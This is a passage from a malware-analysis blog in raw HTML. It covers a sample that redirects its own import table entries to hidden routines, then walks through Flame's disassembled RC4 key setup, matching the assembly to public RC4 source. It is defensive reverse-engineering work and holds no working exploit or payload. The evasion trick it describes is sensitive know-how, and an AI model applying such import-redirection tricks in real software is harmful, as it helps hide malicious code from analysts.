<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcd-WgVUk_5csfnOm0Xs9VX4XAg0RK4JV-YL-qbSCJFPKZDwa5tDjTMKzsJ294zyWFJ1ihpn8hZFQAPze8O1EJpbVVcogobdaG7NIJCgoy36Ld0f3VHFK1qe3jtZpQltw5hhmOKqf_aJw/s1600/CreateWindowExW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcd-WgVUk_5csfnOm0Xs9VX4XAg0RK4JV-YL-qbSCJFPKZDwa5tDjTMKzsJ294zyWFJ1ihpn8hZFQAPze8O1EJpbVVcogobdaG7NIJCgoy36Ld0f3VHFK1qe3jtZpQltw5hhmOKqf_aJw/s1600/CreateWindowExW.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<span style="font-family: Verdana, sans-serif;"><br />
As we can see the ones above seem to be normal, legitimate, calls, but they are really hijacked to the malicious routines. And here is the trick in action in the debugger:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA_NzAPcT9KBJ4KQ2FEnawYqMCzmYuSbF8HPTipxO_NZv3i7-2f6RupNPjY2P-YxNv6Akl6xLEkId0xkp-4HvZrFBq70V45gbmPhxNT8Zk1vyK-e1Gt8mxE3TO2XKEhSyRCNzzUaPAr_U/s1600/deb_reg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA_NzAPcT9KBJ4KQ2FEnawYqMCzmYuSbF8HPTipxO_NZv3i7-2f6RupNPjY2P-YxNv6Akl6xLEkId0xkp-4HvZrFBq70V45gbmPhxNT8Zk1vyK-e1Gt8mxE3TO2XKEhSyRCNzzUaPAr_U/s1600/deb_reg.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJhU2zMI62GJyvNM5URjtnuGurJiazVb025fViUtq6M35-OcSVHkggOdn4obQ9SQhrDx-9-5HIYAfnEQYu_Vd7ihCI851D9_UfwkvGnar8BW9ySb8IqKaok_BXorfWQGsGVE1jmsUjRM/s1600/deb_create.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJhU2zMI62GJyvNM5URjtnuGurJiazVb025fViUtq6M35-OcSVHkggOdn4obQ9SQhrDx-9-5HIYAfnEQYu_Vd7ihCI851D9_UfwkvGnar8BW9ySb8IqKaok_BXorfWQGsGVE1jmsUjRM/s1600/deb_create.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Note that this is not API hooking, but only a simple trick that works in the executable itself: it's not the API code being overwritten, it is the <i>FirstThunk</i> of the malicious executable.</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
What can I say... It's not a very advanced deception trick, but a curious one at least: come on guys, you can do better!</span>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com2tag:blogger.com,1999:blog-8573685359056491736.post-9908242659806466432012-06-11T17:47:00.000-07:002012-06-11T18:52:05.596-07:00Why Flame is a pain to analyze - a look at its intricate compilation style.<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: large;"><u>Introduction</u></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This post is about some peculiarities of the assembly code of Flame, the malware infiltrating Iranian computers. Note that I'm not going to give you any additional detail, or new issues about its analysis; if you are interested in this kind of stuff I suggest you to read the <a href="http://www.crysys.hu/skywiper/skywiper.pdf">report written by CrySyS</a>, that is by far the most comprehensive available description of its different components.</span><br />
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Aside from that, it should be noted that although the main functionalities of Flame have been identified, there's still a lot of undocumented code. So I hope that, for those of you who want to perform their own analysis, it will be helpful to understand more about its compilation style, and that's why I'm writing these little notes.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">In order to do that I decided to discuss a specific routine in the "advnetcfg.ocx" file: the RC4 encryption routine. In particular, I focused on the attempt to retrieve the key.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Although I'm not the first one to find it, as it appears also in the CrySyS report cited above (without describing the procedure), the scope of this post is to show you how a standard task like that is made intricate and time-consuming by the compilation style.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This is only an example to highlight such a kind of structured code, as you will find it all over the malware. Of course, this isn't the only peculiarity that makes its code more difficult to understand: maybe there will be a sequel to continue this discussion.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">First, we will describe how to deal with the RC4 algorithm in order to identify which parameter is used for the key but, even knowing that, it won't be enough for finding its content directly and we will be going through some intricate code to finally reveal its value.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Let's get it started.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><u><span class="Apple-style-span" style="font-size: large;">Analyzing RC4</span></u></span><br />
<div style="text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Giving a look at the code, we notice the following loop: </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"> <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"> .<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1002598F</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [eax+ecx], al</span></span></span></div>
<div>
<div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025992</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> inc eax</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025993</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> cmp eax, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025998</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jl </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">short</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> loc_1002598F</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">It is a typical hint to recognize the RC4 algorithm, as it composes a 0x100 (= 256 dec) bytes array, that is the initial permutation box. Just compare it to one of the RC4 source codes available online (<a href="http://freebsd.active-venture.com/FreeBSD-srctree/newsrc/crypto/rc4/rc4.c.html">this</a>, for instance), and look for the Assembly-C correspondence:</span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="white-space: pre;"><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span><span class="Apple-style-span" style="white-space: pre;"><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">for</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> (i = </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">; i < </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">256</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">; i++)</span></span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small; white-space: pre;"> state->perm[i] = (u_char)i;</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small; white-space: pre;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Then we can see another clear sign of RC4: </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1002599C</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h], dl </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100259A2</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">101</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h], dl</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">It obviously refers to:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">state->index1 = </span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0</span></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">; </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">state->index2 = </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0; </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Putting these lines together we get the RC4 "state" structure, which belongs to the "rc4_init" function. You can also notice that the "rc4_crypt" function is reported in the following lines, as probably the code was just copied from a source similar to the one we are referring to.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">We also know that the prototype of the "rc4_init" function is:</span><br />
<span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">rc4_init(</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">struct</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> rc4_state *</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">const</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> state, </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">const</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> u_char *key, </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> keylen);</span></span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><div style="font-family: Times; font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">But in the assembly code we see only two parameters:</span></div>
</div>
</span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><br />
</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Menlo; font-size: small;"><span class="Apple-style-span" style="font-size: 11px;"></span></span></span></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: Menlo; font-size: small;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025986</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> arg_0 = dword ptr </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">8</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025986</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> arg_4 = dword ptr </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Ch</span></span></div>
<div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">This is weird! It means that one of them is missing: why? For the moment let's just say that the answer is related to the intricate nature of the code that I will clarify later.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">First let's look for the code that uses the key. In the C code we have:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">j += state->perm[i] + key[i % keylen];</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We are interested in finding an Assembly correspondence for the last addendum:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100259DA</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> idiv [ebp+arg_4]</span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This tells us that <i>arg_4</i> is the key length. Moreover:</span><br />
<span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100259DD</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> inc [ebp+var_8]</span></span></span><br />
<span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100259E0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> cmp [ebp+var_8], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h </span></span></span><br />
<span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100259E7</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jl </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">short</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> loc_100259AF</span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, <i>var_8</i> in the Assembly code is the counter <i>i</i> in the C code, and to find the key we have to look for an Assembly instruction reading one byte from the memory. This consideration leads us to:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">mov bl, [esi+edi]</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We are indeed interested in <i>edi</i> that comes from <i>arg_0</i>:</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100259B2</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov edi, [ebp+arg_0]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">that is... the key!</span><br />
